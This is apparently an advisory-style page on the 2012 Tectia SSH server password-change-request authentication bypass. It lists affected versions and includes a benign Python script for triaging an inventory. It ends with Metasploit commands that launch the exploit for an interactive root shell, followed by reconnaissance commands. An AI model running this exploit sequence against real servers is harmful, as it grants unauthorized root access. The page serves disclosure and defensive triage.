Timeline :

Vulnerability discovered by @kingcope
Vulnerability disclosed by @kingcope on 2012-12-01
Metasploit PoC on 2012-12-04

PoC provided by :

kingcope
bperry
sinn3r

Reference(s) :

Full Disclosure
Tectia Support

Affected version(s) :

SSH Tectia Server 6.0.4 to 6.0.20
SSH Tectia Server 6.1.0 to 6.1.12
SSH Tectia Server 6.2.0 to 6.2.5
SSH Tectia Server 6.3.0 to 6.3.2
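
To triage an inventory against the ranges listed above, the following added example (not part of the original post, nor vendor tooling) classifies installed versions. The hostnames and the sample inventory are constructed, and it assumes version strings of the form 6.3.2 or 6.3.2-33; a version outside the ranges is reported as "not listed" because this page says nothing about it.

```python
import re

# Affected ranges exactly as listed on this page (inclusive, major.minor.patch).
AFFECTED_RANGES = [
    ((6, 0, 4), (6, 0, 20)),
    ((6, 1, 0), (6, 1, 12)),
    ((6, 2, 0), (6, 2, 5)),
    ((6, 3, 0), (6, 3, 2)),
]

# Assumption: versions look like "6.3.2" or "6.3.2-33" (optional build suffix).
_VERSION_RE = re.compile(r"^\s*(\d+)\.(\d+)\.(\d+)(?:-(\d+))?\s*$")


def parse_version(text):
    """Return (major, minor, patch), ignoring the build suffix; None if malformed."""
    m = _VERSION_RE.match(text)
    if not m:
        return None
    return tuple(int(p) for p in m.group(1, 2, 3))


def is_affected(text):
    """True/False for a parsable version, None when the string cannot be parsed."""
    v = parse_version(text)
    if v is None:
        return None
    return any(lo <= v <= hi for lo, hi in AFFECTED_RANGES)


def triage(inventory):
    """Split {host: version} into affected, not_listed and unknown host lists."""
    report = {"affected": [], "not_listed": [], "unknown": []}
    for host, version in sorted(inventory.items()):
        verdict = is_affected(version)
        key = "unknown" if verdict is None else ("affected" if verdict else "not_listed")
        report[key].append(host)
    return report


# Constructed inventory: hostnames are hypothetical sample data.
SAMPLE_INVENTORY = {
    "ssh-a": "6.3.2-33",  # the build this page was tested against
    "ssh-b": "6.0.3",     # just below the first listed range
    "ssh-c": "6.1.12",    # upper bound of a listed range
    "ssh-d": "6.3.3",     # just above the last listed range
    "ssh-e": "unknown",   # unparsable: needs manual follow-up
}

if __name__ == "__main__":
    print(triage(SAMPLE_INVENTORY))
```

Hosts in the "unknown" bucket should be checked by hand rather than assumed safe.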

Tested on CentOS 5.8 x86 with :

SSH Tectia Server 6.3.2-33

Description :

This module exploits a vulnerability in Tectia SSH server for Unix-based platforms. The bug is caused by an SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ request sent before password authentication, which allows any remote user to bypass the login routine and then gain access as root.

Commands :

use exploit/unix/ssh/tectia_passwd_changereq
set RHOST 192.168.178.34
set PAYLOAD cmd/unix/interact
exploit

id
uname -a
/sbin/ifconfig